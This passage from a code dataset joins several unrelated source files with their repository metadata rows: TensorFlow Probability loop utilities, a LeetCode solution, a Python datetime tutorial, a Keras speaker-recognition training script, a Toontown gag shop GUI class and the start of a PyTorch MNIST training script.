    body_fn: Callable to be executed `loop_num_iter` times.
    initial_loop_vars: Listlike object of `Tensors` to be passed in to
      `body_fn`'s first execution.
    parallel_iterations: The number of iterations allowed to run in parallel.
      It must be a positive integer. See `tf.while_loop` for more details.
      Default value: `10`.
    name: Python `str` name prefixed to Ops created by this function.
      Default value: `None` (i.e., "smart_for_loop").
  Returns:
    result: `Tensor` representing applying `body_fn` iteratively `n` times.
  """
  with tf.name_scope(name or 'smart_for_loop'):
    loop_num_iter_ = tf.get_static_value(loop_num_iter)
    # Use `tf.while_loop` when the trip count is not statically known, when
    # executing eagerly, or when inside an XLA compilation context.
    if (loop_num_iter_ is None or tf.executing_eagerly() or
        control_flow_util.GraphOrParentsInXlaContext(
            tf1.get_default_graph())):
      # Cast to int32 to run the comparison against i in host memory,
      # where while/LoopCond needs it.
      loop_num_iter = tf.cast(loop_num_iter, dtype=tf.int32)
      # `[1:]` drops the loop counter, returning only the body's loop vars.
      return tf.while_loop(
          cond=lambda i, *args: i < loop_num_iter,
          body=lambda i, *args: [i + 1] + list(body_fn(*args)),
          loop_vars=[np.int32(0)] + initial_loop_vars,
          parallel_iterations=parallel_iterations
      )[1:]
    # Statically known count: unroll as a plain Python loop.
    result = initial_loop_vars
    for _ in range(loop_num_iter_):
      result = body_fn(*result)
    return result
def trace_scan(loop_fn,
               initial_state,
               elems,
               trace_fn,
               trace_criterion_fn=None,
               static_trace_allocation_size=None,
               parallel_iterations=10,
               name=None):
  """A simplified version of `tf.scan` that has configurable tracing.
  This function repeatedly calls `loop_fn(state, elem)`, where `state` is the
  `initial_state` during the first iteration, and the return value of `loop_fn`
  for every iteration thereafter. `elem` is a slice of `elements` along the
  first dimension, accessed in order. Additionally, it calls `trace_fn` on the
  return value of `loop_fn`. The `Tensor`s in return values of `trace_fn` are
  stacked and returned from this function, such that the first dimension of
  those `Tensor`s matches the size of `elems`.
  Args:
    loop_fn: A callable that takes in a `Tensor` or a nested collection of
      `Tensor`s with the same structure as `initial_state`, a slice of `elems`
      and returns the same structure as `initial_state`.
    initial_state: A `Tensor` or a nested collection of `Tensor`s passed to
      `loop_fn` in the first iteration.
    elems: A `Tensor` that is split along the first dimension and each element
      of which is passed to `loop_fn`.
    trace_fn: A callable that takes in the return value of `loop_fn` and returns
      a `Tensor` or a nested collection of `Tensor`s.
    trace_criterion_fn: Optional callable that takes in the return value of
      `loop_fn` and returns a boolean `Tensor` indicating whether to trace it.
      If `None`, all steps are traced.
      Default value: `None`.
    static_trace_allocation_size: Optional Python `int` size of trace to
      allocate statically. This should be an upper bound on the number of steps
      traced and is used only when the length cannot be
      statically inferred (for example, if a `trace_criterion_fn` is specified).
      It is primarily intended for contexts where static shapes are required,
      such as in XLA-compiled code.
      Default value: `None`.
    parallel_iterations: Passed to the internal `tf.while_loop`.
    name: Name scope used in this function. Default: 'trace_scan'.
  Returns:
    final_state: The final return value of `loop_fn`.
    trace: The same structure as the return value of `trace_fn`, but with each
      `Tensor` being a stack of the corresponding `Tensors` in the return value
      of `trace_fn` for each slice of `elems`.
  """
  with tf.name_scope(name or 'trace_scan'), tf1.variable_scope(
      tf1.get_variable_scope()) as vs:
    # In graph mode, cache variable reads on the device of the consuming op.
    if vs.caching_device is None and not tf.executing_eagerly():
      vs.set_caching_device(lambda op: op.device)
    initial_state = tf.nest.map_structure(
        lambda x: tf.convert_to_tensor(x, name='initial_state'),
        initial_state)
    elems = tf.convert_to_tensor(elems, name='elems')
    length = prefer_static.size0(elems)
    # This is an TensorArray in part because of XLA, which had trouble with
    # non-statically known indices. I.e. elems[i] errored, but
    # elems_array.read(i) worked.
    elems_array = tf.TensorArray(
        elems.dtype, size=length, element_shape=elems.shape[1:])
    elems_array = elems_array.unstack(elems)
    # Initialize trace arrays.
    # Without a criterion every step is traced, so the trace length equals
    # `length` and can be allocated exactly; with a criterion the length is
    # unknown, so either grow dynamically or use the caller's static bound.
    dynamic_size, initial_size = True, 0
    if trace_criterion_fn is None:
      dynamic_size, initial_size = tf.is_tensor(length), length
    elif static_trace_allocation_size:
      dynamic_size, initial_size = False, static_trace_allocation_size
    trace_arrays = tf.nest.map_structure(
        lambda x: tf.TensorArray(x.dtype,  # pylint: disable=g-long-lambda
                                 size=initial_size,
                                 dynamic_size=dynamic_size,
                                 element_shape=x.shape),
        trace_fn(initial_state))
    # Helper for writing a (structured) state to (structured) arrays.
    def trace_one_step(num_steps_traced, trace_arrays, state):
      return tf.nest.map_structure(
          lambda ta, x: ta.write(num_steps_traced, x),
          trace_arrays,
          trace_fn(state))
    def _body(i, state, num_steps_traced, trace_arrays):
      elem = elems_array.read(i)
      state = loop_fn(state, elem)
      # Only advance the trace when the criterion (if any) holds.
      trace_arrays, num_steps_traced = prefer_static.cond(
          trace_criterion_fn(state) if trace_criterion_fn else True,
          lambda: (trace_one_step(num_steps_traced, trace_arrays, state),  # pylint: disable=g-long-lambda
                   num_steps_traced + 1),
          lambda: (trace_arrays, num_steps_traced))
      return i + 1, state, num_steps_traced, trace_arrays
    # Loop carries: (element index, loop_fn state, #steps traced, arrays).
    _, final_state, _, trace_arrays = tf.while_loop(
        cond=lambda i, *_: i < length,
        body=_body,
        loop_vars=(0, initial_state, 0, trace_arrays),
        parallel_iterations=parallel_iterations)
    stacked_trace = tf.nest.map_structure(lambda x: x.stack(), trace_arrays)
    # Restore the static length if we know it.
    static_length = tf.TensorShape(None if dynamic_size else initial_size)
    def _merge_static_length(x):
      tensorshape_util.set_shape(x, static_length.concatenate(x.shape[1:]))
      return x
    stacked_trace = tf.nest.map_structure(_merge_static_length, stacked_trace)
    return final_state, stacked_trace
def make_innermost_setter(setter):
  """Wraps a setter so it applies to the inner-most results in `kernel_results`.

  The wrapped setter unwraps `kernel_results` and applies `setter` to the first
  results without an `inner_results` attribute.

  Args:
    setter: A callable that takes the kernel results as well as some `*args`
      and `**kwargs` and returns a modified copy of those kernel results.

  Returns:
    new_setter: A wrapped `setter`.
  """
  @functools.wraps(setter)
  def _new_setter(kernel_results, *args, **kwargs):
    """Wrapped setter."""
    # Descend to the innermost results, remembering each wrapper level.
    outer_layers = []
    innermost = kernel_results
    while hasattr(innermost, 'inner_results'):
      outer_layers.append(innermost)
      innermost = innermost.inner_results
    updated = setter(innermost, *args, **kwargs)
    # Re-wrap from the inside out, replacing each layer's `inner_results`.
    while outer_layers:
      updated = outer_layers.pop()._replace(inner_results=updated)
    return updated
  return _new_setter
def make_innermost_getter(getter):
  """Wraps a getter so it applies to the inner-most results in `kernel_results`.

  The wrapped getter unwraps `kernel_results` and returns the return value of
  `getter` called with the first results without an `inner_results` attribute.

  Args:
    getter: A callable that takes Kernel results and returns some value.

  Returns:
    new_getter: A wrapped `getter`.
  """
  @functools.wraps(getter)
  def _new_getter(kernel_results, *args, **kwargs):
    """Wrapped getter."""
    # Unlike `make_innermost_setter`, nothing needs re-wrapping afterwards,
    # so there is no need to accumulate the outer layers (the original
    # built an unused stack); just drill down to the innermost results.
    while hasattr(kernel_results, 'inner_results'):
      kernel_results = kernel_results.inner_results
    return getter(kernel_results, *args, **kwargs)
  return _new_getter
def enable_store_parameters_in_results(kernel):
  """Enables the `store_parameters_in_results` parameter in a chain of kernels.
  This is a temporary utility for use during the transition period of the
  parameter storage methods.
  Args:
    kernel: A TransitionKernel.
  Returns:
    kernel: The same kernel, but recreated with `store_parameters_in_results`
      recursively set to `True` in its parameters and its inner kernels (as
      appropriate).
  """
  kernel_stack = []
  # Unwrap nested kernels, remembering each wrapper so it can be rebuilt.
  while hasattr(kernel, 'parameters') and 'inner_kernel' in kernel.parameters:
    kernel_stack.append(kernel)
    kernel = kernel.parameters['inner_kernel']
  def _recreate_kernel(kernel, parameters):
    # Rebuild `kernel` with `parameters` overriding its own, forcing
    # `store_parameters_in_results=True` where the kernel supports it.
    new_parameters = kernel.parameters.copy()
    new_parameters.update(parameters)
    if 'store_parameters_in_results' in new_parameters:
      new_parameters['store_parameters_in_results'] = True
    # Silence deprecation warnings triggered by re-invoking the constructor
    # with its original (possibly deprecated) arguments.
    with deprecation.silence():
      return type(kernel)(**new_parameters)
  if hasattr(kernel, 'parameters'):
    kernel = _recreate_kernel(kernel, {})
  # Re-wrap from the innermost kernel outwards.
  for outer_kernel in reversed(kernel_stack):
    outer_kernel = _recreate_kernel(outer_kernel, {'inner_kernel': kernel})
    kernel = outer_kernel
  return kernel
def _is_tensor_like(param):
  """Returns `True` if `param` looks like a simple (immutable) tensor value.

  Lists/tuples are tensor-like only if all of their elements are. A
  `tf.Variable` is deliberately *not* tensor-like: it is mutable. Anything
  else is tensor-like iff NumPy can represent it with a non-object dtype.

  Args:
    param: Arbitrary kernel parameter value.

  Returns:
    Python `bool`.
  """
  if is_list_like(param):
    return all(_is_tensor_like(p) for p in param)
  if isinstance(param, tf.Tensor):
    return True
  elif isinstance(param, tf.Variable):
    return False
  else:
    # The `np.object` alias was removed in NumPy 1.24; the builtin `object`
    # is the equivalent dtype spelling. Object-dtype arrays (e.g. wrapping
    # callables or arbitrary Python objects) are not simple tensors.
    return np.array(param).dtype != object
def warn_if_parameters_are_not_simple_tensors(params_dict):
  """Emits one warning per parameter that is not a simple tensor-like value."""
  for param_name, param in params_dict.items():
    if _is_tensor_like(param):
      continue
    warnings.warn(
        '`{}` is not a `tf.Tensor`, Python number, or Numpy array. If this '
        'parameter is mutable (e.g., a `tf.Variable`), then the '
        'behavior implied by `store_parameters_in_results` will silently '
        'change on 2019-08-01. Please consult the docstring for '
        '`store_parameters_in_results` details and use '
        '`store_parameters_in_results=True` to silence this warning.'.format(
            param_name))
def index_remapping_gather(params,
                           indices,
                           axis=0,
                           indices_axis=0,
                           name='index_remapping_gather'):
  """Gather values from `axis` of `params` using `indices_axis` of `indices`.
  The shape of `indices` must broadcast to that of `params` when
  their `indices_axis` and `axis` (respectively) are aligned:
  ```python
  # params.shape:
  [p[0], ..., ..., p[axis], ..., ..., p[rank(params)] - 1])
  # indices.shape:
  [i[0], ..., i[indices_axis], ..., i[rank(indices)] - 1])
  ```
  In particular, `params` must have at least as many
  leading dimensions as `indices` (`axis >= indices_axis`), and at least as many
  trailing dimensions (`rank(params) - axis >= rank(indices) - indices_axis`).
  The `result` has the same shape as `params`, except that the dimension
  of size `p[axis]` is replaced by one of size `i[indices_axis]`:
  ```python
  # result.shape:
  [p[0], ..., ..., i[indices_axis], ..., ..., p[rank(params) - 1]]
  ```
  In the case where `rank(params) == 5`, `rank(indices) == 3`, `axis = 2`, and
  `indices_axis = 1`, the result is given by
  ```python
  # alignment is: v axis
  # params.shape == [p[0], p[1], p[2], p[3], p[4]]
  # indices.shape == [i[0], i[1], i[2]]
  # ^ indices_axis
  result[i, j, k, l, m] = params[i, j, indices[j, k, l], l, m]
  ```
  Args:
    params: `N-D` `Tensor` (`N > 0`) from which to gather values.
      Number of dimensions must be known statically.
    indices: `Tensor` with values in `{0, ..., params.shape[axis] - 1}`, whose
      shape broadcasts to that of `params` as described above.
    axis: Python `int` axis of `params` from which to gather.
    indices_axis: Python `int` axis of `indices` to align with the `axis`
      over which `params` is gathered.
    name: String name for scoping created ops.
  Returns:
    `Tensor` composed of elements of `params`.
  Raises:
    ValueError: If shape/rank requirements are not met.
  """
  with tf.name_scope(name):
    params = tf.convert_to_tensor(params, name='params')
    indices = tf.convert_to_tensor(indices, name='indices')
    params_ndims = tensorshape_util.rank(params.shape)
    indices_ndims = tensorshape_util.rank(indices.shape)
    # `axis` dtype must match ndims, which are 64-bit Python ints.
    axis = tf.get_static_value(tf.convert_to_tensor(axis, dtype=tf.int64))
    indices_axis = tf.get_static_value(
        tf.convert_to_tensor(indices_axis, dtype=tf.int64))
    # Static validation: `tf.gather`'s `batch_dims` must be a Python int,
    # so ranks and axes must be known at graph-construction time.
    if params_ndims is None:
      raise ValueError(
          'Rank of `params`, must be known statically. This is due to '
          'tf.gather not accepting a `Tensor` for `batch_dims`.')
    if axis is None:
      raise ValueError(
          '`axis` must be known statically. This is due to '
          'tf.gather not accepting a `Tensor` for `batch_dims`.')
    if indices_axis is None:
      raise ValueError(
          '`indices_axis` must be known statically. This is due to '
          'tf.gather not accepting a `Tensor` for `batch_dims`.')
    if indices_axis > axis:
      raise ValueError(
          '`indices_axis` should be <= `axis`, but was {} > {}'.format(
              indices_axis, axis))
    if params_ndims < 1:
      raise ValueError(
          'Rank of params should be `> 0`, but was {}'.format(params_ndims))
    if indices_ndims is not None and indices_ndims < 1:
      raise ValueError(
          'Rank of indices should be `> 0`, but was {}'.format(indices_ndims))
    if (indices_ndims is not None and
        (indices_ndims - indices_axis > params_ndims - axis)):
      raise ValueError(
          '`rank(params) - axis` ({} - {}) must be >= `rank(indices) - '
          'indices_axis` ({} - {}), but was not.'.format(
              params_ndims, axis, indices_ndims, indices_axis))
    # `tf.gather` requires the axis to be the rightmost batch ndim. So, we
    # transpose `indices_axis` to be the rightmost dimension of `indices`...
    transposed_indices = dist_util.move_dimension(indices,
                                                  source_idx=indices_axis,
                                                  dest_idx=-1)
    # ... and `axis` to be the corresponding (aligned as in the docstring)
    # dimension of `params`.
    broadcast_indices_ndims = indices_ndims + (axis - indices_axis)
    transposed_params = dist_util.move_dimension(
        params,
        source_idx=axis,
        dest_idx=broadcast_indices_ndims - 1)
    # Next we broadcast `indices` so that its shape has the same prefix as
    # `params.shape`.
    transposed_params_shape = prefer_static.shape(transposed_params)
    # Target shape: the params shape with the gathered axis replaced by the
    # size of the indices axis (see the docstring's `result.shape`).
    result_shape = prefer_static.concat([
        transposed_params_shape[:broadcast_indices_ndims - 1],
        prefer_static.shape(indices)[indices_axis:indices_axis + 1],
        transposed_params_shape[broadcast_indices_ndims:]], axis=0)
    broadcast_indices = prefer_static.broadcast_to(
        transposed_indices,
        result_shape[:broadcast_indices_ndims])
    result_t = tf.gather(transposed_params,
                         broadcast_indices,
                         batch_dims=broadcast_indices_ndims - 1,
                         axis=broadcast_indices_ndims - 1)
    # Finally, move the gathered dimension back to its original position.
    return dist_util.move_dimension(result_t,
                                    source_idx=broadcast_indices_ndims - 1,
                                    dest_idx=axis)
| 39.024896 | 110 | 0.671948 |
a932f0f76898ac06c45eb4c125cb8bb2c8ab054f | 1,063 | py | Python | Leetcode/0417. Pacific Atlantic Water Flow/0417.py | Next-Gen-UI/Code-Dynamics | a9b9d5e3f27e870b3e030c75a1060d88292de01c | [
"MIT"
] | null | null | null | Leetcode/0417. Pacific Atlantic Water Flow/0417.py | Next-Gen-UI/Code-Dynamics | a9b9d5e3f27e870b3e030c75a1060d88292de01c | [
"MIT"
] | null | null | null | Leetcode/0417. Pacific Atlantic Water Flow/0417.py | Next-Gen-UI/Code-Dynamics | a9b9d5e3f27e870b3e030c75a1060d88292de01c | [
"MIT"
] | null | null | null | class Solution:
def pacificAtlantic(self, heights: List[List[int]]) -> List[List[int]]:
m = len(heights)
n = len(heights[0])
dirs = [0, 1, 0, -1, 0]
qP = deque()
qA = deque()
seenP = [[False] * n for _ in range(m)]
seenA = [[False] * n for _ in range(m)]
for i in range(m):
qP.append((i, 0))
qA.append((i, n - 1))
seenP[i][0] = True
seenA[i][n - 1] = True
for j in range(n):
qP.append((0, j))
qA.append((m - 1, j))
seenP[0][j] = True
seenA[m - 1][j] = True
def bfs(q: deque, seen: List[List[bool]]):
while q:
i, j = q.popleft()
h = heights[i][j]
for k in range(4):
x = i + dirs[k]
y = j + dirs[k + 1]
if x < 0 or x == m or y < 0 or y == n:
continue
if seen[x][y] or heights[x][y] < h:
continue
q.append((x, y))
seen[x][y] = True
bfs(qP, seenP)
bfs(qA, seenA)
return [[i, j] for i in range(m) for j in range(n) if seenP[i][j] and seenA[i][j]]
| 25.926829 | 86 | 0.4619 |
cc0bcceb460b5766a92238a74136043668625e7a | 823 | py | Python | Variado_GeekUniversity/guppe/deltas.py | PauloFTeixeira/curso_python | 9040c7dcc5262620f6330bb9637710bb8899bc6b | [
"MIT"
] | null | null | null | Variado_GeekUniversity/guppe/deltas.py | PauloFTeixeira/curso_python | 9040c7dcc5262620f6330bb9637710bb8899bc6b | [
"MIT"
] | null | null | null | Variado_GeekUniversity/guppe/deltas.py | PauloFTeixeira/curso_python | 9040c7dcc5262620f6330bb9637710bb8899bc6b | [
"MIT"
] | null | null | null | """
Trabalhando com deltas de data e hora
data_inicial = dd/mm/yyyy 12:55:34.9939329
data_final = dd/mm/yyyy 13:34.23.0948484
delta = data_final - data_inicial
import datetime
# Temos a data de hoje
data_hoje = datetime.datetime.now()
# Data para ocorrer um determinado evento no futuro
aniversario = datetime.datetime(2019, 3, 3, 0)
# calculando o delta
tempo_para_evento = aniversario - data_hoje
print(type(tempo_para_evento))
print(repr(tempo_para_evento))
print(tempo_para_evento)
print(f'Faltam {tempo_para_evento.days} dias, {tempo_para_evento.seconds // 60 // 60} horas...')
"""
import datetime
# Purchase happens "now"; a boleto (Brazilian bank slip) is due 3 days later.
data_da_compra = datetime.datetime.now()
regra_boleto = datetime.timedelta(days=3)
vencimento_boleto = data_da_compra + regra_boleto
# Show each step of the calculation, in the same order as before.
for etapa in (data_da_compra, regra_boleto, vencimento_boleto):
    print(etapa)
| 19.139535 | 96 | 0.771567 |
dddb6d79d92bbad951192c3cef5c2d3809fd9bf1 | 3,773 | py | Python | code/1-development/train.py | zacharyclam/speaker_recognition | 8daf3738b3ea7be03d7052112881df6885fbf1a5 | [
"Apache-2.0"
] | 37 | 2018-08-23T05:55:04.000Z | 2021-06-10T13:39:36.000Z | code/1-development/train.py | zacharyclam/speaker_recognition | 8daf3738b3ea7be03d7052112881df6885fbf1a5 | [
"Apache-2.0"
] | 8 | 2018-09-16T03:04:45.000Z | 2021-03-14T07:49:19.000Z | code/1-development/train.py | zacharyclam/speaker_recognition | 8daf3738b3ea7be03d7052112881df6885fbf1a5 | [
"Apache-2.0"
] | 15 | 2018-09-05T08:03:23.000Z | 2020-11-20T07:00:28.000Z | #!/usr/env/python python3
# -*- coding: utf-8 -*-
# @File : train.py
# @Time : 2018/8/12 12:49
# @Software : PyCharm
import os
import tensorflow as tf
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint, TensorBoard, ReduceLROnPlateau
import keras.backend as K
import numpy as np
from model import construct_model
from data_feeder import generate_fit
# Project root: two levels above the *current working directory*.
# NOTE(review): resolved relative to cwd, not this script's location.
root_dir = os.path.abspath(os.path.join(os.getcwd(), "../.."))
# Command-line flags: training hyper-parameters and I/O locations.
tf.flags.DEFINE_integer(
    "batch_size", default=128,
    help="Batch size (default: 128)")
tf.flags.DEFINE_integer(
    "num_epochs", default=100,
    help="Number of training epochs (defaule:100)")
tf.flags.DEFINE_integer(
    "num_classes", default=340,
    help="Number of training data classes (default:340)")
tf.flags.DEFINE_float(
    "learn_rate", default=0.0001,
    help="learn rate (default: 0.0001)")
tf.flags.DEFINE_string(
    "category", default="train",
    help="the category of data")
tf.flags.DEFINE_string(
    "model_dir", default=os.path.join(root_dir, "model"),
    help="the model file dir")
tf.flags.DEFINE_string(
    "tensorboard_dir", default=os.path.join(root_dir, "logs"),
    help="the tensorboard file dir")
tf.flags.DEFINE_string(
    "datalist_dir", default=os.path.join(root_dir, "data/bin"),
    help="the data list file dir")
# FLAGS is the object holding the parsed command-line arguments.
FLAGS = tf.flags.FLAGS
# Force flag parsing now.
FLAGS.flag_values_dict()
# Ensure the output directories exist. `exist_ok=True` makes the calls
# idempotent and avoids the check-then-create race of the previous
# `os.path.exists` + `os.makedirs` pair (e.g. with concurrent runs).
os.makedirs(FLAGS.model_dir, exist_ok=True)
os.makedirs(FLAGS.tensorboard_dir, exist_ok=True)
# The data-list paths (one sample per line).
train_path = os.path.join(FLAGS.datalist_dir, "train_list.txt")
test_path = os.path.join(FLAGS.datalist_dir, "validate_list.txt")


def _count_lines(path):
    """Return the number of lines in `path`.

    Uses a context manager so the file is closed even on error (the
    previous open/close pair leaked the handle on exceptions), and counts
    lazily instead of loading the whole file via `readlines()`.
    """
    with open(path) as fp:
        return sum(1 for _ in fp)


# Number of train / validation samples.
train_nums = _count_lines(train_path)
test_nums = _count_lines(test_path)
if __name__ == '__main__':
    # Restrict TensorFlow to GPU #1.
    os.environ["CUDA_VISIBLE_DEVICES"] = "1"
    config = tf.ConfigProto()
    config.gpu_options.per_process_gpu_memory_fraction = 0.90  # cap at 90% of GPU memory
    K.set_session(tf.Session(config=config))
    # Build the models.
    extract_feature_model, sr_model = construct_model(FLAGS.num_classes)
    # Create the optimizer.
    opt = Adam(lr=FLAGS.learn_rate, beta_1=0.9, beta_2=0.999, epsilon=1e-08)
    sr_model.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])
    # Shrink the learning rate by 10x when validation loss plateaus.
    reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=10,
                                  min_lr=1e-8, mode="min", cooldown=10, verbose=1)
    tbCallBack = TensorBoard(log_dir=FLAGS.tensorboard_dir,
                             histogram_freq=0,
                             write_graph=True,
                             write_images=True)
    # Checkpoint only when validation accuracy improves.
    checkpoint = ModelCheckpoint(filepath=os.path.join(FLAGS.model_dir, "checkpoint-{epoch:05d}-{val_acc:.2f}.h5"),
                                 monitor='val_acc', verbose=2, save_best_only=True, mode='max')
    # Start training.
    sr_model.fit_generator(generate_fit(train_path, FLAGS.batch_size, FLAGS.num_classes),
                           steps_per_epoch=np.ceil(train_nums / FLAGS.batch_size),
                           shuffle=True,
                           validation_data=generate_fit(test_path, FLAGS.batch_size, FLAGS.num_classes),
                           validation_steps=np.ceil(test_nums / FLAGS.batch_size),
                           epochs=FLAGS.num_epochs,
                           verbose=2,
                           callbacks=[reduce_lr, checkpoint, tbCallBack]
                           )
    sr_model.save("spk.h5")
# usage
# nohup python3 -u train.py --batch_size=128 --num_epochs=1000 --learn_rate=0.0001 > logs.out 2>&1 &
| 31.974576 | 115 | 0.655447 |
a5f76d8b50d0f2e40da60cbb39df2fdd0fd87f7d | 5,814 | py | Python | toontown/minigame/PurchaseBase.py | CrankySupertoon01/Toontown-2 | 60893d104528a8e7eb4aced5d0015f22e203466d | [
"MIT"
] | 1 | 2021-02-13T22:40:50.000Z | 2021-02-13T22:40:50.000Z | toontown/minigame/PurchaseBase.py | CrankySupertoonArchive/Toontown-2 | 60893d104528a8e7eb4aced5d0015f22e203466d | [
"MIT"
] | 1 | 2018-07-28T20:07:04.000Z | 2018-07-30T18:28:34.000Z | toontown/minigame/PurchaseBase.py | CrankySupertoonArchive/Toontown-2 | 60893d104528a8e7eb4aced5d0015f22e203466d | [
"MIT"
] | 2 | 2019-12-02T01:39:10.000Z | 2021-02-13T22:41:00.000Z | from toontown.toonbase.ToontownBattleGlobals import *
from toontown.toonbase import ToontownGlobals
from direct.fsm import StateData
from toontown.shtiker.PurchaseManagerConstants import *
from direct.gui.DirectGui import *
from panda3d.core import *
from direct.task import Task
from direct.fsm import State
from direct.fsm import ClassicFSM, State
from toontown.toonbase import TTLocalizer
class PurchaseBase(StateData.StateData):
activateMode = 'purchase'
def __init__(self, toon, doneEvent):
StateData.StateData.__init__(self, doneEvent)
self.toon = toon
self.fsm = ClassicFSM.ClassicFSM('Purchase', [State.State('purchase', self.enterPurchase, self.exitPurchase, ['done']), State.State('done', self.enterDone, self.exitDone, ['purchase'])], 'done', 'done')
self.fsm.enterInitialState()
def load(self, purchaseModels = None):
if purchaseModels == None:
purchaseModels = loader.loadModel('phase_4/models/gui/purchase_gui')
self.music = base.loadMusic('phase_4/audio/bgm/FF_safezone.ogg')
self.jarImage = purchaseModels.find('**/Jar')
self.jarImage.reparentTo(hidden)
self.frame = DirectFrame(relief=None)
self.frame.hide()
self.title = DirectLabel(parent=self.frame, relief=None, pos=(0.0, 0.0, 0.83), scale=1.2, image=purchaseModels.find('**/Goofys_Sign'), text=TTLocalizer.GagShopName, text_fg=(0.6, 0.2, 0, 1), text_scale=0.09, text_wordwrap=10, text_pos=(0, 0.025, 0), text_font=ToontownGlobals.getSignFont())
self.pointDisplay = DirectLabel(parent=self.frame, relief=None, pos=(-1.15, 0.0, 0.16), text=str(self.toon.getMoney()), text_scale=0.2, text_fg=(0.95, 0.95, 0, 1), text_shadow=(0, 0, 0, 1), text_pos=(0, -0.1, 0), image=self.jarImage, text_font=ToontownGlobals.getSignFont())
self.statusLabel = DirectLabel(parent=self.frame, relief=None, pos=(-0.25, 0, 0.625), text=TTLocalizer.GagShopYouHave % self.toon.getMoney(), text_scale=TTLocalizer.PBstatusLabel, text_fg=(0.05, 0.14, 0.4, 1))
if self.toon.getMoney() == 1:
self.statusLabel['text'] = TTLocalizer.GagShopYouHaveOne
self.isBroke = 0
return
def unload(self):
self.jarImage.removeNode()
del self.jarImage
self.frame.destroy()
del self.frame
del self.title
del self.pointDisplay
del self.statusLabel
del self.music
del self.fsm
return
def __handleSelection(self, track, level):
self.handlePurchase(track, level)
def handlePurchase(self, track, level):
if self.toon.getMoney() <= 0:
return
ret = self.toon.inventory.addItem(track, level)
if ret == -3:
text = TTLocalizer.GagShopNotEnoughJellybeans
elif ret == -2:
text = TTLocalizer.GagShopTooManyProps
elif ret == -1:
text = TTLocalizer.GagShopTooManyOfThatGag % TTLocalizer.BattleGlobalAvPropStringsPlural[track][level]
elif ret == 0:
text = TTLocalizer.GagShopInsufficientSkill
else:
text = TTLocalizer.GagShopYouPurchased % TTLocalizer.BattleGlobalAvPropStringsSingular[track][level]
self.toon.inventory.updateGUI(track, level)
self.toon.setMoney(self.toon.getMoney() - 1)
messenger.send('boughtGag')
self.showStatusText(text)
def showStatusText(self, text):
self.statusLabel['text'] = text
taskMgr.remove('resetStatusText')
taskMgr.doMethodLater(2.0, self.resetStatusText, 'resetStatusText')
def resetStatusText(self, task):
self.statusLabel['text'] = ''
return Task.done
def checkForBroke(self):
money = self.toon.getMoney()
self.pointDisplay['text'] = str(money)
if money == 0:
if not self.isBroke:
self.toon.inventory.setActivateModeBroke()
taskMgr.doMethodLater(2.25, self.showBrokeMsg, 'showBrokeMsgTask')
self.isBroke = 1
else:
if self.isBroke:
self.toon.inventory.setActivateMode(self.activateMode)
taskMgr.remove('showBrokeMsgTask')
self.isBroke = 0
if money == 1:
self.statusLabel['text'] = TTLocalizer.GagShopYouHaveOne
else:
self.statusLabel['text'] = TTLocalizer.GagShopYouHave % money
def showBrokeMsg(self, task):
self.statusLabel['text'] = TTLocalizer.GagShopOutOfJellybeans
return Task.done
    def handleDone(self, playAgain):
        # Forward the shop's completion to whoever created this panel.
        messenger.send(self.doneEvent, [playAgain])
    def enter(self):
        # External entry point: switch the FSM into the purchase state.
        self.fsm.request('purchase')
    def exit(self):
        # External exit point: stop the shop music, then leave via 'done'.
        self.music.stop()
        self.fsm.request('done')
    def enterPurchase(self):
        """FSM state entry: show the shop GUI and hook up purchase events."""
        self.frame.show()
        self.toon.inventory.enableUberGags(0)
        self.toon.inventory.show()
        self.toon.inventory.reparentTo(self.frame)
        self.toon.inventory.setActivateMode(self.activateMode)
        self.checkForBroke()
        self.acceptOnce('purchaseOver', self.handleDone)
        self.accept('inventory-selection', self.__handleSelection)
        # Per-toon money event; re-checks broke state on every change.
        self.accept(self.toon.uniqueName('moneyChange'), self.__moneyChange)
    def exitPurchase(self):
        """FSM state exit: hide the GUI and unhook all purchase events/tasks."""
        self.frame.hide()
        self.toon.inventory.enableUberGags(1)
        self.toon.inventory.reparentTo(hidden)
        self.toon.inventory.hide()
        self.ignore('purchaseOver')
        self.ignore('inventory-selection')
        self.ignore(self.toon.uniqueName('moneyChange'))
        # Cancel any pending status-label tasks scheduled by this panel.
        taskMgr.remove('resetStatusText')
        taskMgr.remove('showBrokeMsgTask')
    def __moneyChange(self, money):
        # 'moneyChange' event handler: refresh the display/broke state.
        self.checkForBroke()
    def enterDone(self):
        # FSM 'done' state: nothing to do on entry.
        pass
    def exitDone(self):
        # FSM 'done' state: nothing to do on exit.
        pass
| 40.943662 | 298 | 0.652907 |
0bd2b40a246df301b83bc1702e6f30cb75fcc469 | 5,613 | py | Python | classification/mnist_bilinear.py | elviswf/pytorch_cv | a7f11f857a0c1d5e5a807aeed5e594659212fba0 | [
"Apache-2.0"
] | null | null | null | classification/mnist_bilinear.py | elviswf/pytorch_cv | a7f11f857a0c1d5e5a807aeed5e594659212fba0 | [
"Apache-2.0"
] | null | null | null | classification/mnist_bilinear.py | elviswf/pytorch_cv | a7f11f857a0c1d5e5a807aeed5e594659212fba0 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
@Time : 2018/2/5 15:48
@Author : Elvis
CUDA_VISIBLE_DEVICES=7 python mnist_bilinear.py
mnist_bilinear1
"""
import os
import argparse
import torch
from torch import nn
import torch.optim as optim
from torchvision import datasets, transforms
from torch.autograd import Variable
from torch.backends import cudnn
from models.basenet import bilinearNet
from utils.logger import progress_bar
# Learning rate parameters
BASE_LR = 0.001
NUM_CLASSES = 10  # set the number of classes in your dataset
DATA_DIR = "/home/elvis/code/data/mnist"
BATCH_SIZE = 32
IMAGE_SIZE = 28
MODEL_NAME = "mnist_bilinear1"
USE_GPU = torch.cuda.is_available()
MODEL_SAVE_FILE = MODEL_NAME + '.pth'

# Command-line options; --resume restores net/optimizer/epoch from the
# last checkpoint saved under ./checkpoints/.
parser = argparse.ArgumentParser(description='PyTorch mnist_bilinear1 Training')
parser.add_argument('--lr', default=BASE_LR, type=float, help='learning rate')
parser.add_argument('--resume', '-r', action='store_true', default=False, help='resume from checkpoint')
parser.add_argument('--data', default=DATA_DIR, type=str, help='file path of the dataset')
args = parser.parse_args()

best_acc = 0.      # best test accuracy seen so far (drives checkpointing)
start_epoch = 0    # first epoch to run (non-zero when resuming)
print("Model: " + MODEL_NAME)
if args.resume:
    print("==> Resuming from checkpoint...")
